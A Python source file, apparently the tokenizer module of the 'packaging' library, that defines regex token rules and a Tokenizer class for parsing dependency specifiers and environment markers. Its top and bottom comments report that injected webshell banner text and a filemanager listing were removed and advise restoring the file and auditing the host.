# NOTE(security): injected spam text (a "Mr.X webshell" banner, Telegram
# contact advertisements, and a shell-prompt fragment) was found prepended
# to this module. It was not Python and broke the file's syntax; the
# injected text has been replaced by this comment. Treat the host as
# compromised: restore this file from a trusted `packaging` release and
# audit the server for a webshell.
from __future__ import annotations

import contextlib
import re
from dataclasses import dataclass
from typing import Generator, Mapping, NoReturn

from .specifiers import Specifier


@dataclass
class Token:
    """A single lexed token: a rule name, the matched text, and its offset."""

    name: str  # name of the rule (key in the tokenizer's rules mapping) that matched
    text: str  # exact substring of the source matched by the rule's regex
    position: int  # offset into the source string where the match begins


class ParserSyntaxError(Exception):
    """The provided source text could not be parsed correctly."""

    def __init__(
        self,
        message: str,
        *,
        source: str,
        span: tuple[int, int],
    ) -> None:
        # Keep the failing source and the (start, end) span so __str__ can
        # render a caret diagram pointing at the offending region.
        self.span = span
        self.message = message
        self.source = source

        super().__init__()

    def __str__(self) -> str:
        # Underline [start, end) with tildes and place a caret at the end.
        start, end = self.span
        pointer = f"{' ' * start}{'~' * (end - start)}^"
        return "\n    ".join([self.message, self.source, pointer])


# Terminal token rules used by the Tokenizer. Each entry maps a token name to
# a compiled regex that is matched (anchored) at the current source position;
# there is no global priority order — the parser asks for tokens by name.
DEFAULT_RULES: dict[str, re.Pattern[str]] = {
    # Punctuation / delimiters.
    "LEFT_PARENTHESIS": re.compile(r"\("),
    "RIGHT_PARENTHESIS": re.compile(r"\)"),
    "LEFT_BRACKET": re.compile(r"\["),
    "RIGHT_BRACKET": re.compile(r"\]"),
    "SEMICOLON": re.compile(r";"),
    "COMMA": re.compile(r","),
    # A string in single or double quotes (no escapes, no embedded quotes).
    "QUOTED_STRING": re.compile(
        r"""
            (
                ('[^']*')
                |
                ("[^"]*")
            )
        """,
        re.VERBOSE,
    ),
    # Comparison operators; longer alternatives listed first so e.g. "==="
    # is not split into "==" + "=".
    "OP": re.compile(r"(===|==|~=|!=|<=|>=|<|>)"),
    "BOOLOP": re.compile(r"\b(or|and)\b"),
    "IN": re.compile(r"\bin\b"),
    "NOT": re.compile(r"\bnot\b"),
    # Environment-marker variable names; [._] accepts both the spelled
    # variants (e.g. "os.name" and "os_name").
    "VARIABLE": re.compile(
        r"""
            \b(
                python_version
                |python_full_version
                |os[._]name
                |sys[._]platform
                |platform_(release|system)
                |platform[._](version|machine|python_implementation)
                |python_implementation
                |implementation_(name|version)
                |extras?
                |dependency_groups
            )\b
        """,
        re.VERBOSE,
    ),
    # A full version specifier (operator + version), composed from the regex
    # fragments declared on Specifier so both stay in sync.
    "SPECIFIER": re.compile(
        Specifier._operator_regex_str + Specifier._version_regex_str,
        re.VERBOSE | re.IGNORECASE,
    ),
    "AT": re.compile(r"\@"),
    # A URL is simply "everything up to the next whitespace".
    "URL": re.compile(r"[^ \t]+"),
    "IDENTIFIER": re.compile(r"\b[a-zA-Z0-9][a-zA-Z0-9._-]*\b"),
    # Trailing ".*" prefix-match marker and "+local" version label.
    "VERSION_PREFIX_TRAIL": re.compile(r"\.\*"),
    "VERSION_LOCAL_LABEL_TRAIL": re.compile(r"\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*"),
    "WS": re.compile(r"[ \t]+"),
    # Matches only at end-of-input.
    "END": re.compile(r"$"),
}


class Tokenizer:
    """Context-sensitive token parsing.

    Provides methods to examine the input stream to check whether the next token
    matches.
    """

    def __init__(
        self,
        source: str,
        *,
        rules: Mapping[str, re.Pattern[str]],
    ) -> None:
        self.source = source
        self.rules = rules
        # Token loaded by a successful check(); cleared again by read().
        self.next_token: Token | None = None
        # Current offset into ``source``.
        self.position = 0

    def consume(self, name: str) -> None:
        """Move beyond provided token name, if at current position."""
        if self.check(name):
            self.read()

    def check(self, name: str, *, peek: bool = False) -> bool:
        """Check whether the next token has the provided name.

        By default, if the check succeeds, the token *must* be read before
        another check. If `peek` is set to `True`, the token is not loaded and
        would need to be checked again.
        """
        # Two checks without an intervening read() indicate a parser bug.
        assert self.next_token is None, (
            f"Cannot check for {name!r}, already have {self.next_token!r}"
        )
        assert name in self.rules, f"Unknown token name: {name!r}"

        expression = self.rules[name]

        # Anchored match at the current position (not a search).
        match = expression.match(self.source, self.position)
        if match is None:
            return False
        if not peek:
            self.next_token = Token(name, match[0], self.position)
        return True

    def expect(self, name: str, *, expected: str) -> Token:
        """Expect a certain token name next, failing with a syntax error otherwise.

        On success the token *is* read (consumed) and returned.
        """
        if not self.check(name):
            # raise_syntax_error() is NoReturn and always raises itself, so no
            # `raise` keyword is needed (the old one re-raised a value that
            # could never exist).
            self.raise_syntax_error(f"Expected {expected}")
        return self.read()

    def read(self) -> Token:
        """Consume the next token and return it."""
        token = self.next_token
        assert token is not None

        self.position += len(token.text)
        self.next_token = None

        return token

    def raise_syntax_error(
        self,
        message: str,
        *,
        span_start: int | None = None,
        span_end: int | None = None,
    ) -> NoReturn:
        """Raise ParserSyntaxError at the given position.

        The span defaults to the zero-width point at the current position;
        callers may widen either end to underline the offending region.
        """
        span = (
            self.position if span_start is None else span_start,
            self.position if span_end is None else span_end,
        )
        raise ParserSyntaxError(
            message,
            source=self.source,
            span=span,
        )

    @contextlib.contextmanager
    def enclosing_tokens(
        self, open_token: str, close_token: str, *, around: str
    ) -> Generator[None, None, None]:
        """Run the enclosed parse inside an optional delimiter pair.

        If ``open_token`` is present it is consumed before yielding, and the
        matching ``close_token`` is then required (and consumed) after the
        body finishes; if no opening delimiter is present, the body runs with
        no closing requirement.
        """
        if self.check(open_token):
            open_position = self.position
            self.read()
        else:
            open_position = None

        yield

        # No opening delimiter was seen, so none needs to be closed.
        if open_position is None:
            return

        if not self.check(close_token):
            self.raise_syntax_error(
                f"Expected matching {close_token} for {open_token}, after {around}",
                span_start=open_position,
            )

        self.read()

# NOTE(security): an injected web "Filemanager" directory listing (non-Python
# text advertising file names, sizes, and permissions) trailed this module
# and broke its syntax; it has been replaced by this comment. Restore this
# file from a trusted `packaging` release and audit the host for compromise.